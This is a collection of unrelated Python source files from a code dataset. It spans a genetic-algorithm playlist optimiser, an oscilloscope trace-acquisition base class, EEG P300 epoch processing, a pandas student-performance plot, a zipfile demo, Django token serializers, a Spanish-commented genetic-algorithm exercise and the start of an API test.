        # Deletion: drop a random track, keeping at least a few songs.
        victim = random.choice(range(0, len(individual)))
        del individual[victim]
    return creator.Individual(individual),
# Initial playlist length; mutation may later grow/shrink individuals.
NUM_SONGS = 20
toolbox = base.Toolbox()
# An individual starts as NUM_SONGS distinct random tracks.
toolbox.register("tracks", random.sample, all_tracks, NUM_SONGS)
toolbox.register("individual", tools.initIterate, creator.Individual, toolbox.tracks)
toolbox.register("population", tools.initRepeat, list, toolbox.individual)
# Target play time of 120 minutes for the first objective.
toolbox.register("evaluate", evalPlaylist, desired_play_time=120)
# Penalty score for invalid playlists: worst possible value per objective
# (float max for minimised objectives, 0.0 for maximised ones).
invalidPlaylistScore = (sys.float_info.max, sys.float_info.max, sys.float_info.max,
                        sys.float_info.max, sys.float_info.max, sys.float_info.max,
                        sys.float_info.max, 0.0, 0.0, 0.0)
toolbox.decorate("evaluate", tools.DeltaPenalty(validPlaylist, invalidPlaylistScore))
toolbox.register("mate", tools.cxOnePoint)
toolbox.register("mutate", mutatePlaylist)
toolbox.register("select", tools.selNSGA2)
# Simulation parameters:
# Number of generations
NGEN = 5000
# The number of individuals to select for the next generation (eliminate bad ones).
MU = 500
# The number of children to produce at each generation.
LAMBDA = 50
# The probability that an offspring is produced by crossover.
CXPB = 0.5
# The probability that an offspring is produced by mutation.
MUTPB = 0.5
# Initial population
pop = toolbox.population(n=MU)
# The top playlist is the one that is best on all scores in the fitness
hof = tools.ParetoFront()
# fitness is composed of:
# 0: diff_play_time, 1: genre_entropy, 2: tonal_keys_entropy,
# 3: sum_diff_bpm, 4: diff_beats_loudness, 5: diff_loudness, 6: diff_dissonance,
# 7: avg_interest, 8: avg_listens, 9: avg_favorites
# compute some statistics as the simulation proceeds
diff_play_time_stats = tools.Statistics(key=lambda ind: ind.fitness.values[0])
genre_entropy_stats = tools.Statistics(key=lambda ind: ind.fitness.values[1])
tonal_keys_entropy_stats = tools.Statistics(key=lambda ind: ind.fitness.values[2])
sum_diff_bpm_stats = tools.Statistics(key=lambda ind: ind.fitness.values[3])
diff_beats_loudness_stats = tools.Statistics(key=lambda ind: ind.fitness.values[4])
diff_loudness_stats = tools.Statistics(key=lambda ind: ind.fitness.values[5])
diff_dissonance_stats = tools.Statistics(key=lambda ind: ind.fitness.values[6])
avg_interest_stats = tools.Statistics(key=lambda ind: ind.fitness.values[7])
avg_listens_stats = tools.Statistics(key=lambda ind: ind.fitness.values[8])
avg_favorites_stats = tools.Statistics(key=lambda ind: ind.fitness.values[9])
stats = tools.MultiStatistics(time=diff_play_time_stats,
                              genre=genre_entropy_stats,
                              tonal=tonal_keys_entropy_stats,
                              bpm=sum_diff_bpm_stats,
                              bloud=diff_beats_loudness_stats,
                              loud=diff_loudness_stats,
                              diss=diff_dissonance_stats,
                              interest=avg_interest_stats,
                              listens=avg_listens_stats,
                              favs=avg_favorites_stats)
stats.register("avg", numpy.mean, axis=0)
# run the simulation
algorithms.eaMuPlusLambda(pop, toolbox, MU, LAMBDA, CXPB, MUTPB, NGEN,
                          stats, halloffame=hof, verbose=False)
# First entry of the Pareto front is reported as "best".
best = hof[0]
print("Best playlist:")
print("---")
for track in best:
    print("%s - %s / %s (%s, %.2f BPM) %s" % (track, tracks_metadata[track]['artist_name'],
                                              tracks_metadata[track]['track_title'],
                                              tracks_metadata[track]['track_duration'],
                                              track_features[track]['bpm'],
                                              tracks_metadata[track]['track_genres']))
print('---')
print("Diff play time:", best.fitness.values[0])
print("Genre entropy:", best.fitness.values[1])
print("Tonal keys entropy:", best.fitness.values[2])
print("Sum diff BPM:", best.fitness.values[3])
print("Diff beats loudness:", best.fitness.values[4])
print("Diff loudness:", best.fitness.values[5])
print("Diff dissonance:", best.fitness.values[6])
print("Avg interest:", best.fitness.values[7])
print("Avg listens:", best.fitness.values[8])
print("Avg favorites:", best.fitness.values[9])
# write playlist (copy songs and create m3u file, one song per line)
import os
from shutil import copyfile
os.mkdir('output')
with open('output/playlist.m3u', 'wt') as m3u:
    for track in best:
        # NOTE(review): assumes track keys are paths with at least 4 '/'
        # components (filename at index 3) — confirm against the pickles.
        trackmp3 = track.split('/')[3]
        copyfile(track, 'output/%s' % trackmp3)
        m3u.write('%s\n' % trackmp3)
| StarcoderdataPython |
189008 | <filename>src/sca3s/backend/acquire/scope/__init__.py<gh_stars>0
# Copyright (C) 2018 SCARV project <<EMAIL>>
#
# Use of this source code is restricted per the MIT license, a copy of which
# can be found at https://opensource.org/licenses/MIT (or should be included
# as LICENSE.txt within the associated archive or repository).
from sca3s import backend as sca3s_be
from sca3s import middleware as sca3s_mw
from sca3s.backend.acquire import board as board
from sca3s.backend.acquire import scope as scope
from sca3s.backend.acquire import hybrid as hybrid
from sca3s.backend.acquire import driver as driver
from sca3s.backend.acquire import repo as repo
from sca3s.backend.acquire import depo as depo
import abc, h5py, numpy, os
# conf_derive() selectors: which capture parameter to derive from the others.
CONF_DERIVE_RESOLUTION = 0
CONF_DERIVE_DURATION = 1
CONF_DERIVE_INTERVAL = 2

# conf_select() phases, used by calibrate(): initial vs. final configuration.
CONF_SELECT_INIT = 0
CONF_SELECT_FINI = 1

# Bounds on the accepted resolution value — units not verifiable from this
# file (presumably device resolution steps); TODO confirm in the drivers.
CONF_RESOLUTION_MIN = 0
CONF_RESOLUTION_MAX = 1024

# acquire() bit-mask flags: arm/prime the scope and/or fetch the captured trace.
ACQUIRE_MODE_PRIME = 0x01
ACQUIRE_MODE_FETCH = 0x02
class ScopeAbs( abc.ABC ) :
  """Abstract base class for oscilloscope drivers used during acquisition.

  Concrete subclasses implement configuration derivation/selection, trace
  acquisition, and open/close of the underlying device; this base provides
  auto-calibration and HDF5 persistence helpers.
  """
  def __init__( self, job ) :
    self.job = job
    # Scope identity/configuration taken from the job description.
    self.scope_id = self.job.conf.get( 'scope_id' )
    self.scope_spec = self.job.conf.get( 'scope_spec' )
    self.scope_mode = self.job.conf.get( 'scope_mode' )
    self.scope_path = self.job.conf.get( 'scope_path' )
    self.scope_unit = None
    # Trigger/acquire channel parameters, populated by the concrete driver.
    self.channel_trigger_range = None
    self.channel_trigger_threshold = None
    self.channel_acquire_range = None
    self.channel_acquire_threshold = None
    # Signal capture parameters, set via conf_select().
    self.signal_resolution = None
    self.signal_dtype = None
    self.signal_interval = None
    self.signal_duration = None
    self.signal_samples = None
  def __str__( self ) :
    return self.scope_id
  def calibrate( self, dtype = None, resolution = None ) :
    """Auto-calibrate the capture duration in four steps and return it.

    Step 0 selects a default configuration; step 1 runs one large trial;
    step 2 runs `calibrate_trials` small trials plus a percentage margin;
    step 3 runs one final confirming trial. Trial traces are written under
    <job.path>/calibrate as HDF5 files.
    """
    trace_spec = self.job.conf.get( 'trace_spec' )
    trace_calibrate_trials = int( trace_spec.get( 'calibrate_trials' ) )
    trace_calibrate_margin = int( trace_spec.get( 'calibrate_margin' ) )
    if ( not os.path.isdir( os.path.join( self.job.path, 'calibrate' ) ) ) :
      os.mkdir( os.path.join( self.job.path, 'calibrate' ) )
    def step( fd, n ) :
      """Acquire n traces into fd; return each trigger's duration (seconds)."""
      fd.create_dataset( 'trace/trigger', ( n, self.signal_samples ), self.signal_dtype )
      fd.create_dataset( 'trace/signal', ( n, self.signal_samples ), self.signal_dtype )
      ls = list()
      for i in range( n ) :
        trace = self.job.driver.acquire()
        fd[ 'trace/trigger' ][ i ] = sca3s_be.share.util.resize( trace[ 'trace/trigger' ], self.signal_samples, dtype = self.signal_dtype )
        fd[ 'trace/signal' ][ i ] = sca3s_be.share.util.resize( trace[ 'trace/signal' ], self.signal_samples, dtype = self.signal_dtype )
        ls.append( sca3s_be.share.util.measure( sca3s_be.share.util.MEASURE_MODE_DURATION, trace[ 'trace/trigger' ], self.job.scope.channel_trigger_threshold ) * self.job.scope.signal_interval )
      return ls
    # step #0: default
    self.job.log.indent_inc( message = 'auto-calibration step #0: default' )
    t = self.conf_select( scope.CONF_SELECT_INIT, dtype = dtype, resolution = resolution )
    self.job.log.info( 't_conf = %s', str( t ) )
    self.job.log.indent_dec()
    # step #1: 1 * large trial(s)
    self.job.log.indent_inc( message = 'auto-calibration step #1: large trial(s)' )
    with h5py.File( os.path.join( self.job.path, 'calibrate', 'calibrate-step_1.hdf5' ), 'a' ) as fd :
      ls = step( fd, 1 ) ; l = max( ls ) ; l = ( 2 * l )
      self.job.log.info( 'ls = %s -> l = %s', str( ls ), str( l ) )
    t = self.conf_select( scope.CONF_SELECT_FINI, dtype = t[ 'dtype' ], resolution = t[ 'resolution' ], interval = t[ 'interval' ], duration = l )
    self.job.log.info( 't_conf = %s', str( t ) )
    self.job.log.indent_dec()
    # step #2: n * small trial(s) + margin
    self.job.log.indent_inc( message = 'auto-calibration step #2: small trial(s)' )
    with h5py.File( os.path.join( self.job.path, 'calibrate', 'calibrate-step_2.hdf5' ), 'a' ) as fd :
      ls = step( fd, trace_calibrate_trials ) ; l = max( ls ) ; l = ( 1 * l ) + ( ( trace_calibrate_margin / 100 ) * l )
      self.job.log.info( 'ls = %s -> l = %s', str( ls ), str( l ) )
    t = self.conf_select( scope.CONF_SELECT_FINI, dtype = t[ 'dtype' ], resolution = t[ 'resolution' ], interval = t[ 'interval' ], duration = l )
    self.job.log.info( 't_conf = %s', str( t ) )
    self.job.log.indent_dec()
    # step #3: 1 * final trial(s)
    self.job.log.indent_inc( message = 'auto-calibration step #3: final trial(s)' )
    with h5py.File( os.path.join( self.job.path, 'calibrate', 'calibrate-step_3.hdf5' ), 'a' ) as fd :
      ls = step( fd, 1 ) ; l = max( ls ) ; l = ( 1 * l )
    self.job.log.indent_dec()
    return l
  def hdf5_add_attr( self, trace_content, fd ) :
    """Write the scope's signal parameters as HDF5 file attributes."""
    fd.attrs.create( 'scope/signal_dtype', str( self.signal_dtype ), dtype = h5py.string_dtype() )
    fd.attrs.create( 'scope/signal_resolution', ( self.signal_resolution ), dtype = '<u8' )
    fd.attrs.create( 'scope/signal_interval', ( self.signal_interval ), dtype = '<f8' )
    fd.attrs.create( 'scope/signal_duration', ( self.signal_duration ), dtype = '<f8' )
    fd.attrs.create( 'scope/signal_samples', ( self.signal_samples ), dtype = '<u8' )
  def hdf5_add_data( self, trace_content, fd, n ) :
    """Create the HDF5 datasets (n traces each) requested by trace_content."""
    if ( 'trace/trigger' in trace_content ) :
      fd.create_dataset( 'trace/trigger', ( n, self.signal_samples ), dtype = self.signal_dtype )
    if ( 'trace/signal' in trace_content ) :
      fd.create_dataset( 'trace/signal', ( n, self.signal_samples ), dtype = self.signal_dtype )
    if ( 'crop/trigger' in trace_content ) :
      fd.create_dataset( 'crop/trigger', ( n, ), dtype = h5py.regionref_dtype )
    if ( 'crop/signal' in trace_content ) :
      fd.create_dataset( 'crop/signal', ( n, ), dtype = h5py.regionref_dtype )
  def hdf5_set_data( self, trace_content, fd, n, i, trace ) :
    """Store trace i of n into fd, resizing/cropping as requested.

    Signals are resized to signal_samples; edge markers are clamped into
    range; crop/* entries are HDF5 region references spanning the trigger
    window [edge/pos, edge/neg).
    """
    if ( 'trace/trigger' in trace ) :
      trace[ 'trace/trigger' ] = sca3s_be.share.util.resize( trace[ 'trace/trigger' ], self.signal_samples, dtype = self.signal_dtype )
    if ( 'trace/signal' in trace ) :
      trace[ 'trace/signal' ] = sca3s_be.share.util.resize( trace[ 'trace/signal' ], self.signal_samples, dtype = self.signal_dtype )
    if ( 'edge/pos' in trace ) :
      trace[ 'edge/pos' ] = min( trace[ 'edge/pos' ], self.signal_samples - 1 )
    if ( 'edge/neg' in trace ) :
      trace[ 'edge/neg' ] = min( trace[ 'edge/neg' ], self.signal_samples - 1 )
    if ( 'trace/trigger' in trace_content ) :
      fd[ 'trace/trigger' ][ i ] = trace[ 'trace/trigger' ]
    if ( 'trace/signal' in trace_content ) :
      fd[ 'trace/signal' ][ i ] = trace[ 'trace/signal' ]
    if ( 'crop/trigger' in trace_content ) :
      fd[ 'crop/trigger' ][ i ] = fd[ 'trace/trigger' ].regionref[ i, trace[ 'edge/pos' ] : trace[ 'edge/neg' ] ]
    if ( 'crop/signal' in trace_content ) :
      fd[ 'crop/signal' ][ i ] = fd[ 'trace/signal' ].regionref[ i, trace[ 'edge/pos' ] : trace[ 'edge/neg' ] ]
  @abc.abstractmethod
  def conf_derive( self, mode, dtype = None, resolution = None, interval = None, duration = None ) :
    raise NotImplementedError()
  @abc.abstractmethod
  def conf_select( self, mode, dtype = None, resolution = None, interval = None, duration = None ) :
    raise NotImplementedError()
  @abc.abstractmethod
  def acquire( self, mode = scope.ACQUIRE_MODE_PRIME | scope.ACQUIRE_MODE_FETCH ) :
    raise NotImplementedError()
  @abc.abstractmethod
  def open( self ) :
    raise NotImplementedError()
  @abc.abstractmethod
  def close( self ) :
    raise NotImplementedError()
| StarcoderdataPython |
76617 | import pickle
import pathlib
import numpy as np
from bci3wads.utils import constants
class Epoch:
    """One recording epoch: EEG signals plus P300 speller stimulus streams."""

    def __init__(self, signals, flashing, stimulus_codes, stimulus_types,
                 target_char):
        # Number of EEG channels (second axis of the signal matrix).
        self.n_channels = signals.shape[1]
        self.signals = signals
        self.flashing = flashing
        self.stimulus_codes = stimulus_codes
        self.stimulus_types = stimulus_types
        self.target_char = target_char

    def flash_start_indices(self):
        """Return the sample indices where a flash turns on (0 -> 1 edges)."""
        indices = [
            i for i in range(len(self.flashing))
            if (i == 0) # Each epoch begins with the first flash
            or (self.flashing[i] == 1 and self.flashing[i - 1] == 0)
        ]
        return indices

    def sample_channel(self, indices, channel_id=constants.CHANNEL_ID,
                       window_size=constants.WINDOW_SIZE):
        """Cut a window_size-sample window starting at each index, one channel."""
        channel_signals = self.signals[:, channel_id]
        samples = np.array([
            channel_signals[i:i+window_size]
            for i in indices
        ])
        return samples

    def samples_codes(self, indices):
        """Stimulus code active at each of the given sample indices."""
        return self.stimulus_codes[indices]

    def process_channel(self, channel_id=constants.CHANNEL_ID,
                        window_size=constants.WINDOW_SIZE):
        """Group one channel's flash windows by stimulus code.

        Returns an array indexed [code, repetition, sample].
        """
        indices = self.flash_start_indices()
        samples = self.sample_channel(indices, window_size=window_size,
                                      channel_id=channel_id)
        codes = self.samples_codes(indices)
        n_codes = len(np.unique(codes)) # Should be 12
        # For each code, the positions of its flashes within `samples`.
        positions = np.array([
            np.nonzero(codes == i)[0]
            for i in range(n_codes)
        ])
        processed = np.array([samples[position] for position in positions])
        return processed

    def process_channels(self, channel_ids=constants.CHANNEL_IDS,
                         window_size=constants.WINDOW_SIZE):
        """Concatenate per-channel processed windows along the sample axis."""
        processed_channels = np.concatenate([
            self.process_channel(channel_id, window_size)
            for channel_id in channel_ids
        ], axis=-1)
        return processed_channels

    def target_char_codes(self):
        """Row/column stimulus codes of the target character (rows offset by 6)."""
        codes = np.nonzero(constants.CHARACTERS == self.target_char)
        return [codes[0][0] + 6, codes[1][0]]

    def target_char_coords(self):
        """(row, column) of the target character in the speller matrix."""
        coords = np.nonzero(constants.CHARACTERS == self.target_char)
        return [coords[0][0], coords[1][0]]
class Subject:
    """One subject's pickled session: raw signals plus stimulus streams.

    Removes the commented-out eager `self.epochs` construction the original
    carried (it duplicated the `epochs` property below).
    """

    def __init__(self, filename, is_train=True):
        """Load the pickled session file from INTER_DATA_PATH.

        Test sessions (`is_train=False`) lack target_chars/stimulus_types,
        hence the .get() lookups.
        """
        with open(constants.INTER_DATA_PATH.joinpath(filename), 'rb') as f:
            data = pickle.load(f)
        self.is_train = is_train
        self.name = pathlib.Path(filename).stem
        self.signals = data['signals']
        self.target_chars = data.get('target_chars')
        self.flashings = data['flashings']
        self.stimulus_codes = data['stimulus_codes']
        self.stimulus_types = data.get('stimulus_types')

    @property
    def epochs(self):
        """Build Epoch objects lazily; labelled only for training subjects."""
        if self.is_train:
            return [
                Epoch(signal, flashing, codes, types, target_char)
                for signal, flashing, codes, types, target_char in zip(
                    self.signals, self.flashings, self.stimulus_codes,
                    self.stimulus_types, self.target_chars
                )
            ]
        return [
            Epoch(signal, flashing, codes, stimulus_types=None,
                  target_char=None)
            for signal, flashing, codes in zip(
                self.signals, self.flashings, self.stimulus_codes
            )
        ]

    def process_epoch_channels(self, epoch_id=constants.EPOCH_ID,
                               channel_ids=constants.CHANNEL_IDS,
                               window_size=constants.WINDOW_SIZE):
        """Delegate to Epoch.process_channels for the chosen epoch."""
        return self.epochs[epoch_id].process_channels(channel_ids, window_size)

    def process_epoch(self, processed_channels, target_char, target_char_codes,
                      target_char_coords,
                      epoch_id=constants.EPOCH_ID,
                      channel_ids=constants.CHANNEL_IDS):
        """Bundle processed data and labels into a serialisable dict."""
        return {
            'target_char': target_char,
            'target_char_codes': target_char_codes,
            'target_char_coords': target_char_coords,
            'epoch_id': epoch_id,
            'channel_ids': channel_ids,
            'processed_channels': processed_channels,
        }

    def save_epoch(self, data):
        """Pickle an epoch dict under PROC_DATA_PATH/<subject>/channels_<ids>/."""
        dir_path = constants.PROC_DATA_PATH / self.name / \
            f"channels_{'_'.join([str(ind) for ind in data['channel_ids']])}"
        dir_path.mkdir(parents=True, exist_ok=True)
        file_path = dir_path.joinpath(f"epoch_{data['epoch_id']}.pickle")
        with open(file_path, 'wb') as f:
            pickle.dump(data, f)
| StarcoderdataPython |
1611801 | <reponame>armedturret/print-oops-AUV
from . import ash
from . import grm
from . import kwd
from . import mgn
from . import rdi
from . import srf
from . import sxn
from . import tnl
from . import ubx
from . import vtx
from . import nor
| StarcoderdataPython |
1755267 | <filename>SEE/Scripting/2/2b/2b.py
import pandas as pd
from pandas import Series, DataFrame
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
# Load the students-performance dataset from the working directory.
student_df = pd.read_csv("StudentsPerformance.csv")
print("======Data Headers=======")
# NOTE(review): outside a REPL/notebook these head()/info()/describe()
# results are discarded — wrap them in print() if running as a script.
student_df.head()
print("=====Data Decription=====")
student_df.info()
student_df.describe()
# Drop columns not needed for the grouping below.
student_df1 = student_df.drop(['lunch', 'test preparation course'], axis=1)
student_df1.head()
# Replace missing parental-education entries with a default category.
student_df1["parental level of education"] = student_df1["parental level of education"].fillna("high school")
print(student_df1["parental level of education"])
# student_df1["race/ethnicity"] = student_df1['race/ethnicity'].map({
#     "group A": "Asian Students",
#     "group B": "African Students",
#     "group C": "Afro-Asian Students",
#     "group D": "American Students",
#     "group E": "European Students"
# })
print(student_df1.head(10))
# Plot uses the ORIGINAL frame (student_df), which still has the
# 'test preparation course' column dropped from student_df1.
ax = sns.countplot(x="test preparation course", hue="gender", palette="Set1", data=student_df)
ax.set(title="Test Preparation", xlabel="Course", ylabel="Total")
plt.show()
# ax = sns.countplot(x="race/ethnicity", hue="gender", palette="Set1", data=student_df1)
# ax.set(title="Students according to each group", xlabel="Ethnicity", ylabel="Total")
# plt.show()
# marks_intervals = [0, 40, 50, 60, 75]
# categories = ['failed', 'second class', 'first class', 'distinction']
# student_df1['Marks_Categories_math'] = pd.cut(student_df1.mathscore, marks_intervals, labels=categories)
# ax = sns.countplot(x="Marks_Categories_math", hue="gender", palette="Set1", data=student_df1)
# ax.set(title="Math Marks Grouping", xlabel="Marks Groups", ylabel="Total")
# plt.show()
# student_df1['Marks_Categories_reading'] = pd.cut(student_df1.readingscore, marks_intervals, labels=categories)
# ax = sns.countplot(x="Marks_Categories_reading", hue="gender", palette="Set1", data=student_df1)
# ax.set(title="Reading Marks Grouping", xlabel="Marks Groups", ylabel="Total")
# plt.show()
# student_df1['Marks_Categories_writing'] = pd.cut(student_df1.writingscore, marks_intervals, labels=categories)
# ax = sns.countplot(x="Marks_Categories_writing", hue="gender", palette="Set1", data=student_df1)
# ax.set(title="Writing Marks Grouping", xlabel="Marks Groups", ylabel="Total")
# plt.show()
| StarcoderdataPython |
1629855 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import zipfile
from zipfile import ZipFile
zip_file = 'myfile.zip'
# Create a new archive using DEFLATE compression.
with ZipFile(zip_file, 'w', zipfile.ZIP_DEFLATED) as zf:
    # By default, files being added must not have an mtime earlier than 1980.
    for root, dirs, files in os.walk('conf.d'):
        for file in files:
            zf.write(os.path.join(root, file))
    # A string (or a ZipInfo instance) can be written directly as a member.
    zf.writestr('about.txt', 'It is a zip file.')
    # Members inside the archive can be opened for read/write.
    with zf.open('add.txt', 'w') as myfile:
        myfile.write(b'Add a file')
    zf.comment = '注释\nThis is a comment.'.encode('utf-8')
print(f'Is {zip_file} a zip file? ', zipfile.is_zipfile(zip_file))
# Re-open the archive read-only and inspect it.
with ZipFile(zip_file) as zf:
    print(f'File name: {zf.filename}')
    print(zf.read('about.txt').decode('utf-8')) # read a member by name or ZipInfo object
    print(f"Comment:\n{zf.comment.decode('utf-8')}")
    print('\nInfo list:')
    print(f'filename filesize compress_size')
    for i in zf.infolist():
        print(i.filename, '\t', i.file_size, i.compress_size)
    print('\nName list:\n', zf.namelist())
    print('\nContent list:')
    zf.printdir()
    zf.extractall('dst_path')
    # zf.extract('file', 'path') # extract a single member
# Append a file to the existing archive.
with ZipFile(zip_file, 'a') as zf:
    zf.write('new.txt')
# Command-line usage
# -c create an archive
# $ python -m zipfile -c myfile.zip src_dir src_file
# -e extract to the given path
# $ python -m zipfile -e myfile.zip output_dir
# -l list the files in the archive
# $ python -m zipfile -l myfile.zip
# -t test the archive
# $ python -m zipfile -t myfile.zip
| StarcoderdataPython |
177945 | from django.contrib.auth import get_user_model
from rest_framework import serializers
from knox.models import AuthToken
# Resolve the active user model so the serializers also work with custom user models.
User = get_user_model()
# Identifying field of the user model; fall back to 'username' when the
# model does not declare USERNAME_FIELD.
username_field = User.USERNAME_FIELD if hasattr(User, 'USERNAME_FIELD') else 'username'
class UserSerializer(serializers.ModelSerializer):
    """Serializes only the user model's identifying field (``username_field``)."""
    class Meta:
        model = User
        fields = (username_field,)
class AuthTokenSerializer(serializers.ModelSerializer):
    """Serializes a knox ``AuthToken``'s ``created`` timestamp and ``token_key``."""
    class Meta:
        model = AuthToken
        fields = ('created', 'token_key')
3360452 | # Asignatura: Inteligencia Artificial (IYA051)
# Grado en Ingeniería Informática
# Escuela Politécnica Superior
# Universidad Europea del Atlántico
# Caso Práctico (CE_Práctica_01)
# En esta práctica se busca el máximo de una función utilizando computación evolutiva
# Se utiliza un algoritmo genético
# Importar librerías a utilizar
import numpy as np
import matplotlib as plt
import random
# FUNCIONES
# lista números aleatorios
def listaAleatorios(n):
    """Return a list of ``n`` pseudo-random floats in [0, 1) truncated to 2 decimals.

    Parameters
    ----------
    n: int
        Number of random values to generate.
    """
    # Bug fix: ``np.int`` was deprecated and removed in NumPy 1.24; the
    # builtin ``int`` performs the identical truncation of 100 * random().
    lista = [0] * n
    for i in range(n):
        lista[i] = int(100 * random.random()) / 100
    return lista
# función de fitness
def fitness(x):
    """Fitness function to maximize: |(x - 5) / (2 + sin(x))|."""
    shifted = x - 5
    damping = 2 + np.sin(x)
    return np.abs(shifted / damping)
def emparejamiento(k):
    """Roulette selection plus one-point crossover of the two global chromosomes.

    Consumes pre-generated random numbers from the global list ``lista``
    starting at index ``k``: one aptitude draw per individual, one mating
    draw, and (only when mating happens) one cut-point draw. On success the
    tails of the global ``cromosoma1``/``cromosoma2`` are swapped.

    Parameters
    ----------
    k: int
        Starting index into the global random-number list ``lista``.
    """
    # Bug fix: ``cromosoma1``/``cromosoma2`` are rebound below, which made
    # them function-locals and raised UnboundLocalError on the read in
    # ``aux1 = cromosoma1``; declare them global so crossover persists.
    global cromosoma1, cromosoma2
    # Individual 1: apt when its draw does not exceed its selection probability.
    if lista[k]>prob1:
        apto1="NO"
    else:
        apto1="SI"
    k=k+1
    # Individual 2: selected with probability prob2 == 1 - prob1, hence the
    # inverted comparison against prob1.
    if lista[k]>prob1:
        apto2="SI"
    else:
        apto2="NO"
    k=k+1
    # Mating probability draw.
    if lista[k]>prob_empar:
        pempar="NO"
    else:
        pempar="SI"
    k=k+1
    print("Aptitud para emparejamiento -> Individuo 1: ",apto1," Individuo 2: ",apto2)
    if (pempar=="SI") and (apto1=="SI") and (apto2=="SI"):
        print("Hay emparejamiento en esta generación")
        # Cut point: thirds of [0, 1) map to positions 1-3.
        if lista[k]<0.33:
            pcorte=1
        elif lista[k]>0.33 and lista[k]<0.66:
            pcorte=2
        else:
            pcorte=3
        print("Punto de corte para emparejamiento: ",pcorte)
        # New individuals: exchange tails after the cut point.
        aux1=cromosoma1
        aux2=cromosoma2
        cromosoma1=aux1[0:pcorte]+aux2[pcorte:Lcrom]
        cromosoma2=aux2[0:pcorte]+aux1[pcorte:Lcrom]
        print("Nuevos Individuos tras emparejamiento")
        print("Individuo 1 :",cromosoma1)
        print("Individuo 2 :",cromosoma2)
    else:
        print("No hay emparejamiento en esta generación")
    return
def mutacion(k):
    """Apply bit-flip mutation to both global chromosomes in place.

    Consumes 2*Lcrom random numbers from the global list ``lista`` starting
    at index ``k`` (one draw per gene per individual). Genes are flipped via
    item assignment, so no ``global`` declaration is needed.
    """
    # NOTE(review): a gene flips when its draw EXCEEDS prob_mut (0.3), i.e.
    # with probability ~0.7 per gene -- confirm this inversion is intended.
    # Mutation of individual 1
    j=0
    for i in range(k,k+Lcrom):
        if lista[i]>prob_mut:
            print("Se produce mutación en el individuo 1 en la posición ",j)
            if cromosoma1[j]==1:
                cromosoma1[j]=0
            else:
                cromosoma1[j]=1
        j=j+1
    k=k+Lcrom
    # Mutation of individual 2
    j=0
    for i in range(k,k+Lcrom):
        if lista[i]>prob_mut:
            print("Se produce mutación en el individuo 2 en la posición ",j)
            if cromosoma2[j]==1:
                cromosoma2[j]=0
            else:
                cromosoma2[j]=1
        j=j+1
    k=k+Lcrom
    print("Resultado de la mutación")
    print("Individuo 1 :",cromosoma1)
    print("Individuo 2 :",cromosoma2)
    return
def resultadofitness():
    """Evaluate both global chromosomes and refresh the selection probabilities.

    Decodes each 4-bit chromosome (MSB first) to its integer value,
    evaluates ``fitness`` on it, and updates the module-level
    ``prob1``/``prob2`` used for selection in ``emparejamiento``.

    Returns
    -------
    (f1, f2, x1, x2): fitness values and decoded integers of both individuals.
    """
    # Bug fix: without ``global`` these assignments created locals, so the
    # module-level probabilities stayed at their initial 0 and selection in
    # ``emparejamiento`` never saw updated values.
    global prob1, prob2
    # Decode binary chromosome to an integer (bit 0 is the MSB).
    x1=cromosoma1[3]*1+cromosoma1[2]*2+cromosoma1[1]*2*2+cromosoma1[0]*2*2*2
    x2=cromosoma2[3]*1+cromosoma2[2]*2+cromosoma2[1]*2*2+cromosoma2[0]*2*2*2
    f1=fitness(x1)
    f2=fitness(x2)
    print("Fitness -> Individuo 1 (x=",x1,"): ",f1," Individuo 2 (x=",x2,"): ",f2)
    # Selection probabilities proportional to fitness; guard the corner case
    # x1 == x2 == 5 where both fitnesses are exactly zero (division by zero).
    total=f1+f2
    if total == 0:
        prob1=0.5
        prob2=0.5
    else:
        prob1=f1/total
        prob2=f2/total
    print("Probabilidad -> Individuo 1 (p=",prob1,")"," Individuo 2 (p=",prob2,")")
    return f1,f2,x1,x2
def inicializarcromosomas(k):
    """Randomly initialize both global chromosomes in place.

    Consumes 2*Lcrom random numbers from the global list ``lista`` starting
    at index ``k``; each gene becomes 1 when its draw exceeds ``prob_0_1``
    and 0 otherwise. Genes are written by index, so no ``global`` is needed.
    """
    # Initial-generation banner
    print("GENERACIÓN INICIAL")
    # Individual 1
    #cromosoma1 = [0] * Lcrom
    j=0
    for i in range(k,k+Lcrom):
        if lista[i]>prob_0_1:
            cromosoma1[j]=1
        else:
            cromosoma1[j]=0
        j=j+1
    k=k+Lcrom
    print("Individuo 1 :",cromosoma1)
    # Individual 2
    #cromosoma2 = [0] * Lcrom
    j=0
    for i in range(k,k+Lcrom):
        if lista[i]>prob_0_1:
            cromosoma2[j]=1
        else:
            cromosoma2[j]=0
        j=j+1
    k=k+Lcrom
    print("Individuo 2 :",cromosoma2)
    return
# Genetic-algorithm parameters:
# Chromosome length: 4
# Chromosome alphabet: {0,1}
# Population size: 2
# For the creation of the first generation:
# Probability of element '0': random number < 0.5
# Probability of element '1': random number > 0.5
# Crossover (mating) probability: 0.7
# Mutation probability: 0.3
Lcrom=4
n_ind=2
prob_0_1=0.5
prob_empar=0.7
prob_mut=0.3
pos_aleat=0
prob1=0
prob2=0
max_fit=0
max_gen=0
max_x=0
x1=0
x2=0
f1=0
f2=0
cromosoma1 = [0] * Lcrom
cromosoma2 = [0] * Lcrom
aux1=cromosoma1
aux2=cromosoma2
# Pre-generate the pool of random numbers consumed by all GA operators.
n_aleat=1000
lista=listaAleatorios(n_aleat)
print("lista aleatoria",lista)
# Build the initial chromosomes.
inicializarcromosomas(pos_aleat)
pos_aleat=pos_aleat+2*Lcrom
# Evolve successive generations.
n_gen=10
for g in range(0,n_gen):
    print("GENERACIÓN ",g)
    f1,f2,x1,x2 = resultadofitness()
    # Crossover; advances the random index by 3 (2 aptitude draws + 1 mating draw).
    # NOTE(review): when mating happens, emparejamiento also reads lista[k+3]
    # for the cut point, which overlaps the mutation window below -- confirm.
    emparejamiento(pos_aleat)
    pos_aleat=pos_aleat+3
    # Mutation; consumes 2*Lcrom random numbers.
    mutacion(pos_aleat)
    pos_aleat=pos_aleat+2*Lcrom
    # Track the best fitness observed so far.
    if (f1>max_fit):
        max_fit=f1
        max_x=x1
        max_gen=g
    if (f2>max_fit):
        max_fit=f2
        max_x=x2
        max_gen=g
print("Máximo de la función: ",max_fit," (x= ",max_x," Generación: ",max_gen,")")
| StarcoderdataPython |
1746516 | <filename>tests/test_api.py<gh_stars>10-100
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `mlbench_core.api` package."""
import datetime
import pytest
from mlbench_core.api import ApiClient
@pytest.fixture
def kubernetes_api_client_node_port(mocker):
